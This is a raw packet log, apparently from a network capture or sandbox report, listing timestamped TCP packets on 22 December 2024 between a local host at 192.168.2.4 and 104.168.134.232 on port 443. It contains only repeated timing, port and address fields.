                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.617623091 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.617666006 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.617697001 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.617708921 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.617736101 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.617758989 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.619718075 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.619770050 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.619803905 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.619821072 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.619843960 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.619888067 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.622221947 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.622265100 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.622298002 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.622308969 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.622338057 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.622358084 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.799397945 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.799462080 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.799623013 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.799623013 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.799654007 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.800765991 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.800836086 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.801019907 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.801019907 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.801084042 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802196980 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802658081 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802712917 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802751064 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802788019 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802822113 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.802845001 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.805160046 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.805202007 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.805228949 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.805243969 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.805270910 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.805289030 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.807089090 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.807152033 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.807307959 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.807307959 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.807373047 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.807452917 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.809540987 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.809587955 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.809736967 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.809736967 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.809799910 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.809863091 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.811975956 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.812021017 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.812192917 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.812194109 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.812257051 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.812324047 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.814063072 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.814119101 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.814186096 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.814254999 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.814294100 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.814316988 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.995502949 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.995570898 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.995804071 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.995804071 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.995867014 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.995955944 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.997041941 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.997107983 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.997299910 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.997299910 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.997364044 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.998766899 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.998819113 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.998857021 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.998883009 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.998913050 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.998913050 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.999072075 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.001054049 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.001097918 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.001147032 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.001159906 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.001188040 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.001209021 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.003554106 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.003602982 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.003658056 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.003671885 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.003705978 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.003731966 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.005398989 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.005441904 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.005506039 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.005572081 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.005614996 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.007535934 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.008574009 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.008618116 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.008655071 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.008670092 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.008699894 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.008722067 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.010560036 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.010606050 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.010637999 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.010651112 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.010677099 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.010696888 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.189184904 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.189245939 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.189394951 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.189395905 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.189457893 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.190627098 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.190691948 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.190767050 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.190768003 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.190831900 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.191664934 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.192814112 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.192862988 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.193027973 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.193027973 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.193092108 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.193159103 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.194638014 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.194691896 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.194880009 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.194897890 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.194973946 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.197258949 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.197309971 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.197350979 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.197364092 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.197396040 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.197417021 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.199578047 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.199623108 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.199666023 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.199682951 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.199708939 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.199763060 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.201435089 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.201478004 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.201513052 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.201524973 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.201551914 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.201669931 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.203644037 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.203696966 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.203737020 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.203748941 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.203778028 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.207572937 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.381304979 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.381335974 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.381412029 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.381477118 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.381517887 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.382757902 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.382824898 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.382847071 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.382863045 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.382893085 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.382930040 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.385143995 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.385189056 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.385210991 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.385240078 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.385267019 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.387443066 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.387491941 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.387721062 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.387721062 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.387814045 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.389489889 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.389532089 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.389599085 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.389686108 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.389729977 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.391544104 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.391813993 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.391863108 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.391884089 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.391918898 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.391952991 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.394992113 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.395039082 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.395068884 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.395087004 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.395114899 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.395114899 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.395143986 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.396802902 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.396843910 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.396867037 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.396879911 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.396910906 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.396931887 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.573879957 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.573945999 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.574192047 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.574192047 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.574254990 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575548887 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575680971 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575748920 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575767040 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575803995 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575836897 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.575859070 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.577231884 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.577277899 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.577322006 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.577334881 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.577387094 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.577387094 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.579555035 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.579598904 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.579662085 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.579663038 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.579678059 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.579730034 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.582040071 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.582091093 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.582226992 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.582227945 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.582290888 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.582346916 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.584017992 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.584062099 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.584116936 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.584178925 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.584225893 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.584225893 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.586311102 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.586354017 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.586380005 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.586395025 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.586424112 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.586443901 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.588454962 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.588525057 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.588548899 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.588562965 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.588593960 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.588614941 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766212940 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766279936 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766436100 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766436100 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766436100 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766501904 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.766576052 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.767707109 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.767769098 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.767816067 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.767877102 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.767926931 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.767926931 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.769794941 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.769857883 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.769882917 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.769897938 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.769929886 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.769951105 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:34.772181034 CET44349762104.168.134.232192.168.2.4
